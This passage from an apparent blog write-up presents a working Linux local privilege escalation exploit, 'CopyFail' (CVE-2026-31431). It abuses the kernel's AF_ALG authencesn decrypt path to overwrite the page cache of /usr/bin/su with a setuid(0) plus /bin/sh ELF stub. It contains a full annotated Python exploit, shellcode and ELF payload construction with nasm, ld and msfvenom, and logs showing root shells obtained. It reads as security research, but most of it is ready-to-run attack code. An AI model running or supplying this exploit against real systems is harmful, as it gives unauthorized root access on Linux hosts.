└─ rtattr ─┘ └ enckeylen ┘ └ auth key ┘ └ enc key ┘
rtattr:
rta_len = 8
rta_type = 1 // CRYPTO_AUTHENC_KEYA_PARAM
crypto_authenc_key_param:
enckeylen = 0x10
key material:
auth key = 16 zero bytes
enc key = 16 zero bytes
rtattr header = 4 bytes
key param = 4 bytes
auth key = 16 bytes
enc key = 16 bytes
────────────────────────────
total blob length = 40 bytesWe could tune those splits for our preference, but the important field is enckeylen = 0x10. It tells the parser remaining key material are 40 - 8 = 32 bytes. Then calculate:
- last 16 bytes: AES-CBC encryption key
- first 16 bytes: HMAC authentication key
So the kernel interprets the blob as:
┌────────────┬────────────┬───────────────┬─────────────┐
│ rtattr │ key param │ auth key │ enc key │
│ 4 bytes │ 4 bytes │ 16 bytes │ 16 bytes │
└────────────┴────────────┴───────────────┴─────────────┘The keys do not need to be meaningful secrets for the primitive. Authentication is expected to fail. The key blob only needs to be structurally valid so the request reaches _aead_recvmsg() and then crypto_authenc_esn_decrypt(), where the 4-byte scratch write happens before recv() returns an error.
7.1.2.2 Zlib Payload Blob
On the other hand, the compressed payload blob is not arbitrary filler. It is the replacement byte stream that the exploit stages into the target executable 4 bytes at a time. Compression serves one practical purpose: keep the released one-file curl | python3 exploit short while preserving the exact byte sequence to be written.
In the original exploit, the runtime step is simply:
payload = zlib.decompress(payload_blob)But after decoding the blob carefully, an important detail appears: the expanded payload is not bare shellcode. It is a tiny ELF64 executable stub.
The original hex blob is:
78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3and a direct decode shows:
import zlib
from pathlib import Path
blob = bytes.fromhex(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07"
"e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5"
"190c0c0c0032c310d3"
)
payload = zlib.decompress(blob)
p = Path("payload.elf")
p.write_bytes(payload)
p.chmod(0o755)
print(f"[+] wrote {p}")
print(f"[+] len: {len(payload)}")
print(f"[+] first 16 bytes: {payload[:16].hex()}")Output:
axura@pwnlab:~/lab/copy-fail$ python3 decode_blob.py [+] wrote payload.elf [+] len: 160 [+] first 16 bytes: 7f454c46020101000000000000000000 axura@pwnlab:~/lab/copy-fail$ file payload.elf payload.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Those first bytes are the ELF magic plus an ELF64 little-endian header:
7f 45 4c 46 02 01 01 00 ...
└── ELF ──┘ │ │ │ │
magic │ │ │ └─ OS ABI = System V
│ │ └──── ELF version = 1
│ └─────── little-endian
└────────── ELFCLASS64Parse the decoded payload.elf:
axura@pwnlab:~/lab/copy-fail$ readelf -h payload.elf ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x400078 Start of program headers: 64 (bytes into file) Start of section headers: 0 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 1 Size of section headers: 0 (bytes) Number of section headers: 0 Section header string table index: 0 axura@pwnlab:~/lab/copy-fail$ readelf -l payload.elf Elf file type is EXEC (Executable file) Entry point 0x400078 There is 1 program header, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000 0x000000000000009e 0x000000000000009e R E 0x1000
The decompressed payload verifies cleanly:
ELF header
════════════════════════════════
len = 160 bytes
type = ET_EXEC
machine = x86_64
entry = 0x400078
program header table
════════════════════════════════
phoff = 0x40
phnum = 1
PT_LOAD segment
════════════════════════════════
off = 0x0
vaddr = 0x400000
flags = R|X
filesz = 0x9e
memsz = 0x9eSo the released exploit does not overwrite /usr/bin/su with naked shellcode at file offset 0. It overwrites the cached file beginning with a tiny ELF executable. That distinction matters because execve() still expects a valid executable image: ELF magic, program headers, and a loadable executable segment.
Since the only PT_LOAD segment maps file offset 0x0 at virtual address 0x400000, the entry point maps back to file offset:
entry_file_offset = 0x400078 - 0x400000
= 0x78At file offset 0x78, the executable stub begins:
31c031ffb0690f05488d3d0f00000031f66a3b58990f0531ff6a3c580f052f62696e2f7368000000Decoded as x86_64 instructions:
0x78: 31 c0 xor eax, eax
0x7a: 31 ff xor edi, edi
0x7c: b0 69 mov al, 0x69
0x7e: 0f 05 syscall ; setuid(0)
0x80: 48 8d 3d 0f 00 00 00 lea rdi, [rip+0xf] ; -> "/bin/sh"
0x87: 31 f6 xor esi, esi
0x89: 6a 3b push 0x3b
0x8b: 58 pop rax
0x8c: 99 cdq
0x8d: 0f 05 syscall ; execve("/bin/sh", NULL, NULL)
0x8f: 31 ff xor edi, edi
0x91: 6a 3c push 0x3c
0x93: 58 pop rax
0x94: 0f 05 syscall ; exit(0)
0x96: 2f 62 69 6e 2f 73 68 00 "/bin/sh\x00"
0x9e: 00 00 trailing bytes outside PT_LOADSo the payload logic is:
setuid(0) -> execve("/bin/sh",0,0) -> exit(0)In other words, the stub first calls setuid(0), then execve("/bin/sh", NULL, NULL), with the string "/bin/sh\x00" embedded directly after the code.
Conceptually:
zlib blob
│
│ decompress
▼
tiny ELF64 executable
│
├─ valid ELF header
├─ one executable PT_LOAD segment
├─ entry @ 0x400078
├─ code: setuid(0) -> execve("/bin/sh")
└─ embedded string: "/bin/sh\x00"If an attacker wants a different staged payload, the generation step is still straightforward, but the payload must match the overwrite strategy.
For the released exploit style, where the overwrite begins at file offset 0 and the target is later launched through execve(), the decompressed bytes should form a valid executable image — for example, a tiny ELF carrier:
import zlib
from pathlib import Path
desired_payload = Path("payload.elf").read_bytes()
payload_blob = zlib.compress(desired_payload)
payload_blob_hex = payload_blob.hex()
print(payload_blob_hex)he exploit-side decode remains:
payload = zlib.decompress(bytes.fromhex(payload_blob_hex))So the zlib block is not part of the vulnerability mechanics. It is only a compact transport encoding for the bytes that will be planted into the cached executable page. The important constraint is what those bytes represent: if the overwrite starts at file offset 0, they must look like a valid executable image to the ELF loader, not just naked shellcode.
7.2 Full Python Script
The original 732-byte script is ideal for release, but it compresses too many exploit decisions into one line. A readable exploit version should keep the same primitive while making the overwrite layout, request setup, and iteration logic explicit:
- open an
AF_ALGAEAD socket forauthencesn(hmac(sha256),cbc(aes)) - encode the 4-byte write value into
AAD[4:8] - choose a splice length so the last 4 bytes of the imported file range are the bytes to overwrite
- trigger
recv()even though authentication will fail - repeat 4 bytes at a time until the full payload has been staged into page cache
The following version preserves the same strategy as the original PoC, but gives each exploit step a name, adds concise runtime logging, and keeps the control values visible:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Title : CopyFail CVE-2026-31431 Linux LPE exploit
# Date : 2026-05-15
# Author : Axura (@4xura) - https://4xura.com
#
# Description:
# ------------
# AAD[4:8] -> 4-byte controlled write value
# authsize = 4 -> target bytes sit in the imported tag tail
# splice len=t+4 -> the last 4 imported file bytes are the overwrite target
# recv() -> triggers authencesn() scratch write, even if auth fails
#
# Usage:
# ------
# python3 exploit.py
# DEBUG=1 python3 exploit.py [target_basename]
# python3 exploit.py [target_basename]
#
# Notes:
# ------
# Provided for educational purposes only. Use responsibly.
#
import os
import sys
import zlib
import socket
DEBUG = bool(os.getenv("DEBUG"))
def hex_bytes(s: str) -> bytes:
return bytes.fromhex(s)
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
MSG_MORE = 0x8000
# authenc key blob:
# [rtattr|authenc param|16-byte auth key|16-byte AES key]
AUTHENC_KEY_BLOB = hex_bytes("0800010000000010" + "0" * 64)
def open_authencesn_socket() -> tuple[socket.socket, socket.socket]:
"""
Open the vulnerable AEAD transform and one accepted request socket.
userspace:
socket(AF_ALG) -> bind("aead", "authencesn(...)") -> accept()
kernel:
AF_ALG family -> algif_aead -> authencesn decrypt callback later on recv()
"""
tfm = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
tfm.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
tfm.setsockopt(SOL_ALG, ALG_SET_KEY, AUTHENC_KEY_BLOB)
tfm.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
op, _ = tfm.accept()
return tfm, op
def queue_aad(op: socket.socket, write_value: bytes) -> None:
"""
Queue 8 bytes of AAD. Bytes 4..7 become the later 4-byte overwrite.
AAD layout:
byte 0..3 = filler
byte 4..7 = controlled value written later by authencesn()
+------+------+------+------+------+------+------+------+
| A | A | A | A | w0 | w1 | w2 | w3 |
+------+------+------+------+------+------+------+------+
"""
zero = hex_bytes("00")
aad = b"A" * 4 + write_value
# Control messages:
# ALG_SET_OP -> decrypt
# ALG_SET_IV -> 16-byte IV
# ALG_SET_AEAD_ASSOCLEN -> assoclen = 8
op.sendmsg(
[aad],
[
(SOL_ALG, ALG_SET_OP, zero * 4),
(SOL_ALG, ALG_SET_IV, b"\x10" + zero * 19),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b"\x08" + zero * 3),
],
MSG_MORE,
)
def splice_target_window(file_fd: int, op_fd: int, target_offset: int) -> None:
"""
Import the file window whose last 4 bytes are the overwrite target.
splice_len = target_offset + 4
so that the imported bytes are:
file[0 : target_offset] -> ciphertext region
file[target_offset : +4] -> preserved tag tail
authsize = 4 makes those last 4 bytes sit exactly where authencesn()
later performs its destination-side scratch write.
"""
splice_len = target_offset + 4
read_fd, write_fd = os.pipe()
try:
# file -> pipe
os.splice(file_fd, write_fd, splice_len, offset_src=0)
# pipe -> AF_ALG socket
os.splice(read_fd, op_fd, splice_len)
finally:
os.close(read_fd)
os.close(write_fd)
def trigger_decrypt(op: socket.socket, target_offset: int) -> None:
"""
Trigger the decrypt path.
The exploit does not require a successful decrypt. It only requires
authencesn() to execute far enough that:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1)
performs the 4-byte write before recv() reports authentication failure.
"""
try:
op.recv(8 + target_offset)
except OSError as e:
if DEBUG:
print(f" [-] recv() returned: {e}")
def overwrite_4_bytes(file_fd: int, target_offset: int, chunk: bytes) -> None:
"""
Apply one 4-byte overwrite primitive.
exploit geometry for one iteration:
AAD[4:8] = chunk
|
v
recv() -> authencesn() scratch write
|
v
file[target_offset : target_offset+4] in page cache becomes chunk
"""
tfm, op = open_authencesn_socket()
try:
if DEBUG:
print(
f"[+] overwrite @ 0x{target_offset:x}: "
f"{chunk.hex()} ({chunk.decode('latin1', errors='replace')})"
)
queue_aad(op, chunk)
splice_target_window(file_fd, op.fileno(), target_offset)
trigger_decrypt(op, target_offset)
finally:
op.close()
tfm.close()
def decompress_payload() -> bytes:
# zlib-compressed replacement bytes written into the target.
#
# After decompression:
# payload[0:4] -> overwrite at file offset 0x0
# payload[4:8] -> overwrite at file offset 0x4
# ...
#
# main() walks this buffer in 4-byte chunks and turns each chunk into one
# AAD[4:8] value for one exploit iteration.
payload_blob = hex_bytes(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07"
"e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5"
"190c0c0c0032c310d3"
)
return zlib.decompress(payload_blob)
def main() -> None:
target = "/usr/bin/su"
if len(sys.argv) > 1:
target = f"/usr/bin/{sys.argv[1]}"
payload = decompress_payload()
print(f"[+] target : {target}")
print(f"[+] payload : {len(payload)} bytes")
print("[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write")
file_fd = os.open(target, os.O_RDONLY)
try:
# Each loop iteration patches one 4-byte slot in the target executable.
for target_offset in range(0, len(payload), 4):
chunk = payload[target_offset : target_offset + 4]
overwrite_4_bytes(file_fd, target_offset, chunk)
finally:
os.close(file_fd)
print("[+] payload staged into page cache, executing target...")
os.system("su")
if __name__ == "__main__":
main()So the full exploit has two encoded inputs:
- the
AUTHENC_KEY_BLOB, which is the minimum validauthenckey package needed to instantiateauthencesn(hmac(sha256),cbc(aes)) - the zlib-compressed payload blob, which expands into the replacement byte stream later written into the target setuid binary
This version now follows the exploit chain directly:
open_authencesn_socket()selects the vulnerable AEAD implementation.queue_aad()places the controlled 4-byte value inAAD[4:8].splice_target_window()imports a file range whose last 4 bytes are the overwrite target.trigger_decrypt()forcescrypto_authenc_esn_decrypt()to execute the scratch write.main()repeats that primitive until the full replacement payload has been staged into page cache.
Compared with the Chapter 5 PoCs, the important difference is scope: this is no longer a lab-shaped demonstrator for one controlled marker overwrite, but a full exploit driver that repeatedly turns the 4-byte primitive into a complete executable patch.
This pwns:
axura@pwnlab:~$ python3 exploit.py [+] target : /usr/bin/su [+] payload : 160 bytes [+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write [+] overwrite @ 0x0: 7f454c46 (ELF) [-] recv() returned: [Errno 74] Bad message [+] overwrite @ 0x4: 02010100 () [-] recv() returned: [Errno 74] Bad message [+] overwrite @ 0x8: 00000000 () [-] recv() returned: [Errno 74] Bad message [+] overwrite @ 0xc: 00000000 () [-] recv() returned: [Errno 74] Bad message ... [+] overwrite @ 0x94: 0f052f62 (/b) [-] recv() returned: [Errno 74] Bad message [+] overwrite @ 0x98: 696e2f73 (in/s) [-] recv() returned: [Errno 74] Bad message [+] overwrite @ 0x9c: 68000000 (h) [-] recv() returned: [Errno 74] Bad message [+] payload staged into page cache, executing target... # id uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
7.3 C Exploit
Some victim Linux hosts may not install Python by default, so it is neccessary to develop a C version under certain restricted circumstances.
With the exploit chain and the Chapter 5 PoCs in place, a C variant no longer needs any hidden steps. This section is a readable C exploit template that follows the same logic as the Python full exploit:
- instantiate
authencesn(hmac(sha256),cbc(aes)) - place the controlled 4-byte value in
AAD[4:8] - splice
file[0 : target_offset + 4]into the acceptedAF_ALGsocket - trigger decrypt and ignore the expected authentication failure
- repeat 4 bytes at a time until the replacement payload has been staged into page cache
For portability, this template uses ordinary Linux userspace interfaces:
- libc file/socket APIs
- Linux
AF_ALGUAPI headers splice()- an explicit replacement-byte placeholder instead of an embedded compressed blob
7.3.1 Arbitrary Code Execution
For a more tunable arbitrary-code-execution exploit, we should treat the overwrite as an executable loader problem.
From 7.1.2.2, we already know the victim page cache should be patched with a valid ELF64 executable stub, not raw shellcode dropped blindly at file offset 0. That means we need to separate two layers:
- the payload logic we want to run, such as
execve("/bin/sh") - the ELF carrier that wraps that logic in a format the kernel loader accepts
7.3.1.1 Solution 1: Shellcode + Manual ELF Carrier
There are many ways to generate Linux shellcode. For this exploit, I will use my self-developed pwnkit repo:
pip install pwnkitFor the payload logic itself, I use the common execve("/bin/sh") for amd64:
from pwnkit import *
sc = ShellcodeReigstry.get("amd64", "execve_bin_sh")
# Inspect the selected payload
sc.dump()
# Or, as a comma-separated byte array:
print("[+] The comma-separated byte array")
print(", ".join(f"0x{b:02x}" for b in sc.blob))Output:
axura@pwnlab:~/lab/copy-fail$ python3 sc_64.py [+] Shellcode: execve_bin_sh (variant 27, amd64), 27 bytes [+] Description: execve_bin_sh (variant 27) \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05 [+] The comma-separated byte array 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05
At this point we only have the payload logic. For the offset-0 /usr/bin/su path, we still need to wrap those bytes in a loader-friendly file image before feeding them to the exploit.
So next step is to build a fresh minimum ELF carrier around the shellcode.
Create payload.asm:
global _start
section .text
_start:
xor edi, edi
mov eax, 105
syscall
jmp shellcode
shellcode:
db PLACEHOLDER_FOR_SHELLCODEControl flow is simple:
_startbegins at the ELF entry pointxor edi, edi; mov eax, 105; syscallperformssetuid(0)jmp shellcodetransfers execution directly into the embedded bytesdb PLACEHOLDER_FOR_SHELLCODEis where we paste thepwnkitoutput
For the 27-byte amd64 execve_bin_sh payload above, PLACEHOLDER_FOR_SHELLCODE becomes:
db 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91
db 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53
db 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0
db 0x3b, 0x0f, 0x05Then create payload.ld to tell ld how to lay out the ELF. To keep the carrier small, we force a single loadable segment that includes the ELF header and program header in the same mapped region, and place .text immediately after those headers with SIZEOF_HEADERS:
ENTRY(_start)
PHDRS
{
text PT_LOAD FILEHDR PHDRS FLAGS(5); /* R|X */
}
SECTIONS
{
. = 0x400000 + SIZEOF_HEADERS;
.text : {
*(.text*)
*(.rodata*)
} :text
/DISCARD/ : {
*(.note*)
*(.comment*)
*(.eh_frame*)
}
}So the workflow is:
- save the asm stub as
payload.asm - replace
PLACEHOLDER_FOR_SHELLCODEwith the generatedpwnkitbytes - save the linker script as
payload.ld - assemble and link with
nasmandld
Build it:
nasm -f elf64 payload.asm -o payload.o
ld -nostdlib -static -s -T payload.ld -o payload.pwnkit.elf payload.oHere -s already asks ld to strip symbols, so no extra strip step is needed for this compact build.
Output:
axura@pwnlab:~/lab/copy-fail$ ls payload.* payload.asm payload.ld axura@pwnlab:~/lab/copy-fail$ nasm -f elf64 payload.asm -o payload.o axura@pwnlab:~/lab/copy-fail$ ld -nostdlib -static -s -T payload.ld -o payload.pwnkit.elf payload.o axura@pwnlab:~/lab/copy-fail$ file payload.pwnkit.elf payload.pwnkit.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped axura@pwnlab:~/lab/copy-fail$ readelf -l payload.pwnkit.elf Elf file type is EXEC (Executable file) Entry point 0x400080 There is 1 program header, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000 0x00000000000000a6 0x00000000000000a6 R E 0x1000 Section to Segment mapping: Segment Sections... 00 .text axura@pwnlab:~/lab/copy-fail$ readelf -h payload.pwnkit.elf ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x400080 Start of program headers: 64 (bytes into file) Start of section headers: 184 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 1 Size of section headers: 64 (bytes) Number of section headers: 3 Section header string table index: 2
This is the compact result we want for the exploit path: one PT_LOAD, entry at 0x400080, and only 0xa6 bytes to stage into page cache.
Once payload.pwnkit.elf is ready, we can export the exact replacement bytes with:
from pathlib import Path
from pwnkit import *
pl_filename = "payload.pwnkit.elf"
blob = Path(pl_filename).read_bytes()
# Output C macro string-literal format:
# #define PAYLOAD_BYTES "\xde\xad\xbe\xef..."
print("[+] C macro format, use as:")
print('#define PAYLOAD_BYTES "\\xde\\xad\\xbe\\xef..."\n')
print(hex_shellcode(blob))
# Output C byte-array initializer format:
# const unsigned char PAYLOAD_BYTES[] = {0xde, 0xad, 0xbe, 0xef, ...};
print("\n\n[+] C char array format, use as:")
print("const unsigned char PAYLOAD_BYTES[] = { ... };\n")
print(", ".join(f"0x{b:02x}" for b in blob))and then drop that byte array into PAYLOAD_BYTES.
7.3.1.2 Solution 2: Direct ELF Payload From msfvenom
If we do not need a hand-crafted carrier, we can let a payload generator emit a full ELF for us directly. For example:
msfvenom -p linux/x64/exec CMD=/bin/sh -f elf -o payload.elfOutputs a 44-byte only payload, though larger than the raw shellcodes we used in previous section:
axura@pwnlab:~/lab/copy-fail$ msfvenom -p linux/x64/exec CMD=/bin/sh -f elf -o payload.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 44 bytes Final size of elf file: 164 bytes Saved as: payload.elf axura@pwnlab:~/lab/copy-fail$ file payload.elf payload.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header axura@pwnlab:~/lab/copy-fail$ readelf -h payload.elf ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x400078 Start of program headers: 64 (bytes into file) Start of section headers: 0 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 1 Size of section headers: 0 (bytes) Number of section headers: 0 Section header string table index: 0 axura@pwnlab:~/lab/copy-fail$ readelf -l payload.elf Elf file type is EXEC (Executable file) Entry point 0x400078 There is 1 program header, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000 0x00000000000000a4 0x00000000000000d0 RWE 0x1000
That skips the carrier-building step entirely: payload.elf is already a loader-friendly executable image, so the exploit can simply stage its bytes into page cache from file offset 0.
Again, the last step is just to export the file bytes:
from pathlib import Path
from pwnkit import *
pl_filename = "payload.elf"
blob = Path(pl_filename).read_bytes()
# Output C macro string-literal format:
# #define PAYLOAD_BYTES "\xde\xad\xbe\xef..."
print("[+] C macro format, use as:")
print('#define PAYLOAD_BYTES "\\xde\\xad\\xbe\\xef..."\n')
print(hex_shellcode(blob))
# Output C byte-array initializer format:
# const unsigned char PAYLOAD_BYTES[] = {0xde, 0xad, 0xbe, 0xef, ...};
print("\n\n[+] C char array format, use as:")
print("const unsigned char PAYLOAD_BYTES[] = { ... };\n")
print(", ".join(f"0x{b:02x}" for b in blob))ahen places the generated bytes into the PAYLOAD_BYTES variable in the exploit script in 7.3.2. The exploit should behave the same way:
axura@pwnlab:~/lab/copy-fail$ msfvenom -p linux/x64/exec CMD=/bin/sh -f elf -o payload.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 44 bytes Final size of elf file: 164 bytes Saved as: payload.elf axura@pwnlab:~/lab/copy-fail$ file payload.elf payload.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header axura@pwnlab:~/lab/copy-fail$ python3 encode_payload.py [+] C macro format, use as: #define PAYLOAD_BYTES "\xde\xad\xbe\xef..." \x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x80\x00\x40\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x 00\x40\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\xa6\x00\x00\x00\x00\x00\x00\x00\xa6\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x31\xff\xb8\x69\x00\x00\x00\x0f\x05\xeb\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05\x00\x2e\x73\x68\x73\x74\x 72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x80\x00\x40\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x26\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa6\x00\x00\x00\x00\x00\x00\x00\x11 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [+] C char array format, use as: const unsigned char PAYLOAD_BYTES[] = { ... }; 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x 00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x40, 0x00, 0x03, 0x00, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 , 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0xb8, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xeb, 0x00, 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0x db, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05, 0x00, 0x2e, 0x73, 0x68, 0x73, 0x74, 0x72, 0x74, 0x61, 0x62, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 , 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x40, 0x00, 0x 00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 , 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 axura@pwnlab:~/lab/copy-fail$ vim exploit.c axura@pwnlab:~/lab/copy-fail$ gcc -static -Wall -Wextra -O2 -o exploit exploit.c -lz axura@pwnlab:~/lab/copy-fail$ ./exploit [+] target : /usr/bin/su [+] payload : 376 bytes [+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write [+] payload staged into page cache, executing target... # id uid=0(root) gid=1000(axura) 